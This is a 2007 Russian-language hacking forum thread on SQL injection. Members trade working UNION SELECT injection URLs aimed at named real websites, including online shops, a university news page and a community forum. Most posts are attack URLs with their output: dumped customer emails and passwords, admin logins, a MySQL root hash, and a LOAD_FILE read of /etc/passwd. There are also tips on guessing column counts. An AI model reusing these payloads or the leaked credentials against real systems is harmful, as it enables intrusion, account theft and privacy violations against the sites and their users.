SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    хмм и админка на виду:)
    Total Members: 3776
     
    #501 }{0TT@БЬ)Ч, 14 Feb 2007
    Last edited: 14 Feb 2007
  2. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    2Thanat0z
    для перебора можно использывать специальные тулзы, если не дает результата то уже ручками, просто иногда бывает что в таблице 50-60 столбцов...
     
  3. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    или через order by
     
  4. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    я знаю, скриптик выкладывали в "полезные скрипты". Иногда просто нет предпосылок в виде "не то количество колонок", и такие я руками пробую, а иначе скриптом после 10 где-то. Если не катит через юнионселект, пробую через ордербай
     
  5. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    http://www.eclectichomeschool.org/support/state.asp?stateid=(select+top+1+table_name+from+information_schema.tables)--
     
  6. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    Инет-магазины (почти все):

    Не нашел таблиц, лоадфайл вроде не работает:
    Code:
    __http://www.magic-pony.com/product.php?id=-1894+union+select+1,2,3,4,5,6,user,8,9,10,11,12,13,14/*&category=art
    __http://www.shopmuseum.com/category.php?id=18&sub_id=-123'+union+select+1,2,3,4,user(),6,7/*
    ошибки:

    Code:
    __http://amvets.fundlinkllc.com/showcategory.php?id=61'
    __https://shop.invictusnetworks.com/detail.php?id=16026'
    __http://www.usenetportal.com/detail.php?id=713'
    __http://www.alicebxl.com/artsale.php?id=16'
    __http://www.rocbattle.com/battle_details.php?id=37519'
    странное чувство, что здесь есть скуль, сам не нашел:
    Code:
    __http://www.juniperresearch.com/shop/viewreport.php?id=-28'
    __http://www.juniperresearch.com/shop/viewpressrelease.php?pr=-44'
     
    1 person likes this.
  7. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Thanat0z,

    Code:
    http://www.shopmuseum.com/category.php?id=18&sub_id=-123'+union+select+1,2,3,concat(email,0x3a,password),5,6,7+from+customers/*
    [email protected]:flash62

    тут email=login :)
     
    1 person likes this.
  8. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://www.mikeosx.com/newsphp/show.php?id=-99+union+select+1,2,3,4,concat(name,0x3a,pass),6,7,8,9,10+from+users+limit+1,1/*
    
    powermic:52609e00b7ee307e79eb100099b9a8bf
    powermic:fingerprint
    Code:
    http://www.foxreality.com/show.php?id=-99+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x545f7573657273+limit+23,1/*
    
    etc...
    =\
     
    #508 ice1k, 14 Feb 2007
    Last edited: 14 Feb 2007
  9. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    _http://www.fotosale.com.ua/index.php?mod=prodList&cid=1&bid=-99+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,15,6,17/*

    как всегда с названием таблци юзверей проблема((
     
    2 people like this.
  10. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Code:
    http://www.nregion.com/txt.php?i=-8943+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9+from+mysql.user/*
    root:*2E4549A9308C1DFA3E3A1645E3CFD8E787134CBC
     
  11. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://www.nregion.com/txt.php?i=-8943+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7,8,9/*
    
    =\
     
    1 person likes this.
  12. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    А чего смайл перекошеный?) и нафига тебе /etc/passwd если хэш рута есть?))
     
    #512 n0ne, 14 Feb 2007
    Last edited: 14 Feb 2007
  13. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    http://www.rochester.edu/news/show.php?id=27654%20or%201=1/*
    бесит уже 5 раз подряд не могу столбцы подобрать
    2 none - root от бд, а ему может от сервака пароли нужны
     
  14. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    мне они вообще не нужны...
     
    2 people like this.
  15. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    53k юзеров
     
    1 person likes this.
  16. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://www.linuxcd.org/view_distro.php?lst=&id_cate=12&id_distro=-99+union+select+1,2,concat(admin_name,0x3a,admin_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+admin/*
    
    =\
     
    2 people like this.
  17. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    еврейская община
    http://www.jewish.ru/forum/index.php?page=1&idt=15647'%20union%20select%201,2,3,4,5,6,email,8,9,passwd,11,12,13,14%20from%20%20user/*
     
  18. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Termin@L, ты собираешься пароли в /etc/passwd смотреть? :D :D :D
     
  19. loser

    loser New Member

    Joined:
    13 Feb 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    _http://www.monitoroflife.com/?a=details&lid=70+union+select+1*/
    типа этого :
    _http://www.hyipranks.com/?a=details&lid=2575+union+select+1*/
    Два одинаковых движка , но реализовать хз как , т.к. используется много запросов.
     
  20. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    обнаружено: троянская программа Trojan-Downloader.JS.Agent.bx Скрипт: http://www.monitoroflife.com/?a=details&lid=70+union+select+1*/[6]
     
Thread Status:
Not open for further replies.